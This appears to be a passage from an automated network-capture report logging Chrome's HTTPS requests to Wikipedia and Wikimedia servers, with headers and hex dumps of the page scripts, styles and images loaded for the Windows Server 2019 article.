                                                                                                                                                                                                                                      Data Ascii: iawiki.widgets.SizeFilterWidget","1bq7m",[183,204]],["mediawiki.widgets.SizeFilterWidget.styles","jozhq"],["mediawiki.widgets.MediaSearch","185cx",[47,204]],["mediawiki.widgets.Table","hlri2",[204]],["mediawiki.widgets.TagMultiselectWidget","1y5hq",[204]]
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC16320INData Raw: 6c 65 73 73 2e 6a 73 22 2c 22 31 6a 32 30 6c 22 5d 2c 5b 22 65 78 74 2e 74 69 6d 65 6c 69 6e 65 2e 73 74 79 6c 65 73 22 2c 22 31 6f 73 6a 37 22 5d 2c 5b 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 22 2c 22 68 64 34 33 71 22 5d 2c 5b 0a 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 2e 73 70 65 63 69 61 6c 22 2c 22 31 66 6d 36 67 22 2c 5b 32 34 36 2c 31 39 2c 32 30 31 5d 5d 2c 5b 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 2e 76 69 73 75 61 6c 45 64 69 74 6f 72 22 2c 22 31 6a 6c 6e 7a 22 2c 5b 34 33 37 5d 5d 2c 5b 22 65 78 74 2e 63 68 61 72 69 6e 73 65 72 74 22 2c 22 31 73 7a 6b 6a 22 2c 5b 32 34 5d 5d 2c 5b 22 65 78 74 2e 63 68 61 72 69 6e 73 65 72 74 2e 73 74 79 6c 65 73 22 2c 22 31 37 68 63 37 22 5d 2c 5b 22 65 78 74 2e 63 69 74 65 2e 73 74 79 6c 65 73 22 2c 22
                                                                                                                                                                                                                                      Data Ascii: less.js","1j20l"],["ext.timeline.styles","1osj7"],["ext.wikihiero","hd43q"],["ext.wikihiero.special","1fm6g",[246,19,201]],["ext.wikihiero.visualEditor","1jlnz",[437]],["ext.charinsert","1szkj",[24]],["ext.charinsert.styles","17hc7"],["ext.cite.styles","
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC13816INData Raw: 32 32 35 5d 5d 2c 5b 22 73 78 2e 70 75 62 6c 69 73 68 69 6e 67 2e 66 6f 6c 6c 6f 77 75 70 22 2c 22 31 39 31 62 6c 22 2c 5b 36 32 31 2c 36 32 30 2c 32 37 5d 5d 2c 5b 22 65 78 74 2e 63 78 2e 61 72 74 69 63 6c 65 74 6f 70 69 63 73 22 2c 22 71 6e 32 31 70 22 5d 2c 5b 22 6d 77 2e 63 78 33 22 2c 22 70 63 33 30 62 22 2c 5b 36 31 37 2c 36 32 31 2c 36 32 30 2c 32 38 5d 5d 2c 5b 22 6d 77 2e 63 78 33 2e 76 65 22 2c 22 31 6e 38 6b 6b 22 2c 5b 32 35 34 2c 34 31 33 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 75 74 69 6c 22 2c 22 72 68 33 62 32 22 2c 5b 36 31 34 2c 37 35 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 53 69 74 65 4d 61 70 70 65 72 22 2c 22 61 33 78 73 30 22 2c 5b 36 31 34 2c 34 37 2c 37 34 2c 37 35 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 75 69 2e 4c 61 6e 67 75 61 67 65 46 69 6c 74 65
                                                                                                                                                                                                                                      Data Ascii: 225]],["sx.publishing.followup","191bl",[621,620,27]],["ext.cx.articletopics","qn21p"],["mw.cx3","pc30b",[617,621,620,28]],["mw.cx3.ve","1n8kk",[254,413]],["mw.cx.util","rh3b2",[614,75]],["mw.cx.SiteMapper","a3xs0",[614,47,74,75]],["mw.cx.ui.LanguageFilte


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      56192.168.2.1649784185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC459OUTGET /wikipedia/en/thumb/e/ed/Windows_Server_2019_desktop_screenshot.png/300px-Windows_Server_2019_desktop_screenshot.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1077INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_Server_2019_desktop_screenshot.png
                                                                                                                                                                                                                                      last-modified: Sun, 08 Dec 2024 05:43:03 GMT
                                                                                                                                                                                                                                      content-length: 53547
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:47:08 GMT
                                                                                                                                                                                                                                      server: envoy
                                                                                                                                                                                                                                      etag: 113de3e7fd83af27a827bd1e2690b939
                                                                                                                                                                                                                                      age: 29144
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 hit/1
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC13386INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 07 74 49 4d 45 07 e8 0c 08 05 2b 02 a8 32 a8 0f 00 00 80 00 49 44 41 54 78 da ec fd 79 ac 2d 57 96 de 89 fd d6 8e 88 33 dd 79 78 f3 c0 f7 1e c7 64 32 a7 ca 4c 66 55 d6 24 55 96 7a 28 75 69 68 09 86 5d 76 0b 6d c3 b0 db 40 37 8c 86 fd 8f db 53 77 fb 0f c3 30 60 a0 6d b8 2d 35 7a 84 6c 74 ab 05 57 ab 4a 72 aa 54 2a 95 54 53 66 56 e5 44 32 93 64 92 7c 24 df 3c
                                                                                                                                                                                                                                      Data Ascii: PNGIHDR,r|gAMAa cHRMz&u0`:pQ<bKGDCpHYs+tIME+2IDATxy-W3yxd2LfU$Uz(uih]vm@7Sw0`m-5zltWJrT*TSfVD2d|$<
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC15304INData Raw: 2c 44 70 ed e6 06 bb bb 77 99 5f 3a c6 70 77 8f f9 f5 e3 bc f2 d2 4b 7c f0 f6 0f b9 77 ef 3e a3 34 64 75 6d 1e 49 53 ae 5e bf c7 e9 f3 c7 89 44 68 f7 96 b9 70 6e 9d f7 de 7e 87 60 f1 14 97 8e f5 f8 ee 0f 7e c4 ea ea 32 fd 9d 03 c2 5e 8b e1 de 16 1a 75 98 eb 76 51 15 2e be f0 69 9e bf 70 82 47 12 7e 6b 88 58 e2 9c c2 85 dc f9 b9 ce a0 2e 96 bd a9 b5 f9 6b 83 d2 f5 ac c8 df 61 55 aa 72 27 52 0d 35 15 b7 97 8a aa e9 83 04 d6 9a ca 8e da 07 d4 5a 16 23 5a c7 ee 6a 38 0d 8d 99 96 4e 61 6d e5 b8 8e aa d3 2d 97 12 27 52 b1 9e d1 43 89 8f 15 46 0f 6a 0b 93 d3 6a 11 ee f7 18 3d 05 fb ba 9f 05 d5 81 6b 9d 45 3e f5 c5 08 2b 03 da 4d d1 aa 09 1f f4 ba 94 da 34 38 2d 33 b8 5c 75 20 7e fa 95 2a dd db 3c 68 19 bf 44 6c 0e c0 53 f2 d5 b3 41 bb 19 25 a9 e1 51 14 47 41 09
                                                                                                                                                                                                                                      Data Ascii: ,Dpw_:pwK|w>4dumIS^Dhpn~`~2^uvQ.ipG~kX.kaUr'R5Z#Zj8Nam-'RCFjj=kE>+M48-3\u ~*<hDlSA%QGA
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC15296INData Raw: 9b a3 00 bb dd f3 6c 3e f2 24 25 dd 2a ff d7 6a e6 ec 94 9a 52 5e c6 e4 e5 64 ce bd 2a ca ce 32 60 5b 32 f3 93 ec 9c 18 37 19 21 e5 1c a8 16 cc 57 44 cd e3 f8 12 06 24 73 27 49 5b 8b 15 d3 03 23 8a 11 43 ba 7b fd cf 57 ab f5 23 7a 08 99 99 c4 85 95 88 33 4b 21 ef dc 9f 70 61 25 22 b1 d9 8e b5 d2 35 dc ed a7 9c 9a cf 4e ed f6 28 e5 eb 3f 3a 78 80 b3 cc 23 be 93 8f bb 29 68 d1 ed 92 2a 19 35 eb f9 bb 60 14 94 6a 74 5e 34 68 76 5d d1 da b1 a5 58 94 d4 92 15 2d 3a 52 be 6e b0 4c 35 e5 aa a5 98 71 83 cf 4c 5f ab 86 ef 63 ab 24 6a 4a 2a 68 2d a0 cd dc 00 44 1a 8f 39 25 95 e3 5f e7 82 9e ee 5d 77 11 7a 06 56 5b 82 09 c3 0c 5f 33 59 d9 dd 16 83 11 c3 58 ad a3 57 94 ec 7b 75 a3 30 87 09 0e f9 bd 49 f1 b0 ab 99 7b 9a 6b 06 64 fc 2d c1 3a bd ad 5c 4f ab e8 17 7b 9d
                                                                                                                                                                                                                                      Data Ascii: l>$%*jR^d*2`[27!WD$s'I[#C{W#z3K!pa%"5N(?:x#)h*5`jt^4hv]X-:RnL5qL_c$jJ*h-D9%_]wzV[_3YXW{u0I{kd-:\O{
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC9561INData Raw: 5e 45 9a d9 b3 48 ef 11 01 64 9b 81 fd c6 d1 0e 64 b6 e1 fd 14 f3 e1 9a c8 e5 f2 ae 40 aa 30 f2 ae 40 8e e5 2f 44 00 8c 30 df 80 73 b8 51 89 65 c4 0f c3 88 4b b0 50 f3 e6 b0 a1 7b c7 3e d8 d4 22 03 b3 75 c4 8c 42 76 c5 1e bb 22 5b a5 19 40 5b fb ec 27 f8 44 8a 0c 32 73 1f 72 e5 a5 20 84 86 6c 50 e1 7d d2 ab 8e b3 c6 47 0b 86 d5 1f fd f1 80 13 2c 61 a7 65 93 28 9e 50 d6 24 eb f4 95 12 0a d1 a4 27 b4 7b 2d b2 c8 92 24 46 5f a3 51 bf c5 df 30 62 33 09 b6 78 e0 1e f8 d1 1b 36 92 45 4e 49 ed 40 82 f3 fe b3 3a ca 06 00 2e 9d 08 1e 1b 51 0a 9a 58 e4 84 42 2f a9 89 ca 79 48 24 2c 2e ce 86 27 27 e9 94 69 d6 5e c2 46 36 06 dc f9 25 01 6a b3 cf 4c 1c 2b a3 d6 65 9d ad 74 c6 15 54 3d 83 39 6d c8 9a e2 d0 b1 f7 8e ac c5 ef 47 ab 36 2b 2c cd ac c6 03 1b d8 59 a0 30 84
                                                                                                                                                                                                                                      Data Ascii: ^EHdd@0@/D0sQeKP{>"uBv"[@['D2sr lP}G,ae(P$'{-$F_Q0b3x6ENI@:.QXB/yH$,.''i^F6%jL+etT=9mG6+,Y0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      57192.168.2.1649783185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC543OUTGET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC925INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 16:34:33 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 18:29:23 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"24e4-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 4699
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/42102
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 9444
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC9444INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 37 20 31 33 22 3e 3c 70 61 74 68 20 64 3d 22 4d 38 39 2e 37 37 37 20 33 2e 33 32 36 63 2e 31 30 34 20 30 20 2e 31 37 2e 30 33 39 2e 31 37 2e 30 39 32 20 30 20 30 2d 2e 30 35 35 2e 33 36 33 2d 2e 30 35 35 2e 38 33 32 20 30 20 2e 30 39 33 2e 30 37 36 2e 30 38 31 2e 31 31 37 2e 30 33 39 2e 35 38 34 2d 2e 35 39 34 20 31 2e 33 2d 2e 39 32 31 20 31 2e 37 38 31 2d 2e 39 32 31 20 31 2e 33 33 20 30 20 32 2e 33 20 31 2e 32 37 20 32 2e 33 30 31 20 32 2e 36 35 31 20 30 20 31 2e 30 35 2d 2e 33 35 32 20 31 2e 38 36 2d 2e 39 36 33 20 32 2e 34 35 37 2d 2e 35 33 33 2e 35 30 39 2d 31 2e 31 38 2e 37 32 39 2d 31
                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 117 13"><path d="M89.777 3.326c.104 0 .17.039.17.092 0 0-.055.363-.055.832 0 .093.076.081.117.039.584-.594 1.3-.921 1.781-.921 1.33 0 2.3 1.27 2.301 2.651 0 1.05-.352 1.86-.963 2.457-.533.509-1.18.729-1


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      58192.168.2.1649782185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:52 UTC934OUTGET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1mjy2 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC1206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:04:12 GMT
                                                                                                                                                                                                                                      etag: W/"1mjy2"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 10:13:06 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&sourcemap=1&version=1mjy2
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/186622
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 59552
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC13589INData Raw: 6d 77 2e 6c 6f 61 64 65 72 2e 69 6d 70 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 22 65 78 74 2e 76 69 73 75 61 6c 45 64 69 74 6f 72 2e 63 6f 72 65 2e 75 74 69 6c 73 2e 70 61 72 73 69 6e 67 40 31 72 63 72 6f 22 2c 66 75 6e 63 74 69 6f 6e 28 24 2c 6a 51 75 65 72 79 2c 72 65 71 75 69 72 65 2c 6d 6f 64 75 6c 65 29 7b 76 65 2e 69 73 42 6c 6f 63 6b 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 7b 63 6f 6e 73 74 20 65 6c 65 6d 65 6e 74 4e 61 6d 65 3d 74 79 70 65 6f 66 20 65 6c 65 6d 65 6e 74 3d 3d 3d 27 73 74 72 69 6e 67 27 3f 65 6c 65 6d 65 6e 74 3a 65 6c 65 6d 65 6e 74 2e 6e 6f 64 65 4e 61 6d 65 3b 72 65 74 75 72 6e 20 76 65 2e 65 6c 65 6d 65 6e 74 54 79 70 65 73 2e 62 6c 6f 63 6b 2e 69 6e 64 65 78 4f 66 28 65 6c
                                                                                                                                                                                                                                      Data Ascii: mw.loader.impl(function(){return["ext.visualEditor.core.utils.parsing@1rcro",function($,jQuery,require,module){ve.isBlockElement=function(element){const elementName=typeof element==='string'?element:element.nodeName;return ve.elementTypes.block.indexOf(el
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 3d 6e 75 6c 6c 3b 24 28 0a 27 23 66 69 72 73 74 48 65 61 64 69 6e 67 2c 20 23 6d 77 2d 63 6f 6e 74 65 6e 74 2d 74 65 78 74 20 2e 6d 77 2d 65 64 69 74 73 65 63 74 69 6f 6e 27 29 2e 65 61 63 68 28 28 69 2c 65 6c 29 3d 3e 7b 63 6f 6e 73 74 20 74 6f 70 3d 65 6c 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2e 74 6f 70 3b 69 66 28 74 6f 70 3e 30 29 7b 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 3d 65 6c 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 7d 29 3b 69 66 28 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 26 26 66 69 72 73 74 56 69 73 69 62 6c 65 45 64 69 74 53 65 63 74 69 6f 6e 2e 69 64 21 3d 3d 27 66 69 72 73 74 48 65 61 64 69 6e 67 27
                                                                                                                                                                                                                                      Data Ascii: ibleEditSection=null;$('#firstHeading, #mw-content-text .mw-editsection').each((i,el)=>{const top=el.getBoundingClientRect().top;if(top>0){firstVisibleEditSection=el;return false;}});if(firstVisibleEditSection&&firstVisibleEditSection.id!=='firstHeading'
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC2859INData Raw: 6f 67 28 29 3b 7d 29 3b 7d 69 66 28 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 68 61 73 28 27 76 65 6e 6f 74 69 66 79 27 29 29 7b 75 72 6c 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 27 76 65 6e 6f 74 69 66 79 27 29 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 27 27 2c 75 72 6c 29 3b 7d 7d 29 3b 7d 28 29 29 3b 0a 7d 2c 22 6d 6f 64 75 6c 65 73 2f 76 65 2d 6d 77 2f 70 72 65 69 6e 69 74 2f 64 61 74 61 2e 6a 73 6f 6e 22 3a 7b 22 75 6e 73 75 70 70 6f 72 74 65 64 45 64 69 74 50 61 72 61 6d 73 22 3a 5b 22 75 6e 64 6f 22 2c 22 75 6e 64 6f 61 66 74 65 72 22 2c 22 70 72 65 76 69 65 77 22 2c 22 76 65 73 77 69 74 63 68 65 64 22 5d 7d 7d 7d 2c 7b 22 63 73 73 22 3a 5b 22 2e 76 65 2d 61 63 74 69 76 65 20 2e
                                                                                                                                                                                                                                      Data Ascii: og();});}if(url.searchParams.has('venotify')){url.searchParams.delete('venotify');history.replaceState(null,'',url);}});}());},"modules/ve-mw/preinit/data.json":{"unsupportedEditParams":["undo","undoafter","preview","veswitched"]}}},{"css":[".ve-active .
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC16320INData Raw: 61 74 65 64 20 2e 76 65 63 74 6f 72 2d 74 6f 63 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 2c 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 50 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 76 65 2d 75 69 2d 6f 76 65 72 6c 61 79 2d 6c 6f 63 61 6c 2c 2e 76 65 2d 75 69 2d 6f 76 65 72 6c 61 79 2d 67 6c 6f 62 61 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 37 35 72 65 6d 7d 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65 73 6b 74 6f 70 41 72 74 69 63 6c 65 54 61 72 67 65 74 2d 74 6f 6f 6c 62 61 72 50 6c 61 63 65 68 6f 6c 64 65 72 2d 62 61 72 2c 2e 76 65 2d 69 6e 69 74 2d 6d 77 2d 64 65
                                                                                                                                                                                                                                      Data Ascii: ated .vector-toc{display:none}.ve-init-mw-desktopArticleTarget-toolbar,.ve-init-mw-desktopArticleTarget-toolbarPlaceholder,.ve-ui-overlay-local,.ve-ui-overlay-global{font-size:0.875rem}.ve-init-mw-desktopArticleTarget-toolbarPlaceholder-bar,.ve-init-mw-de
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC10464INData Raw: 74 61 72 74 29 3b 69 66 28 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 29 7b 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 2e 73 77 69 74 63 68 65 64 3d 73 77 69 74 63 68 65 64 3b 72 65 73 70 6f 6e 73 65 2e 76 69 73 75 61 6c 65 64 69 74 6f 72 2e 66 72 6f 6d 45 64 69 74 65 64 53 74 61 74 65 3d 66 72 6f 6d 45 64 69 74 65 64 53 74 61 74 65 3b 7d 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 3b 7d 29 3b 7d 6c 65 74 20 64 61 74 61 50 72 6f 6d 69 73 65 2c 61 62 6f 72 74 3b 69 66 28 75 73 65 52 65 73 74 62 61 73 65 29 7b 76 65 2e 74 72 61 63 6b 28 27 74 72 61 63 65 2e 72 65 73 74 62 61 73 65 4c 6f 61 64 2e 65 6e 74 65 72 27 2c 7b 6d 6f 64 65 3a 27 76 69 73 75 61 6c 27 7d 29 3b 63 6f 6e 73 74 20 68 65 61 64 65 72 73 3d 7b 41 63
                                                                                                                                                                                                                                      Data Ascii: tart);if(response.visualeditor){response.visualeditor.switched=switched;response.visualeditor.fromEditedState=fromEditedState;}return response;});}let dataPromise,abort;if(useRestbase){ve.track('trace.restbaseLoad.enter',{mode:'visual'});const headers={Ac


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      59192.168.2.1649787185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:53 UTC591OUTGET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=11c23 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
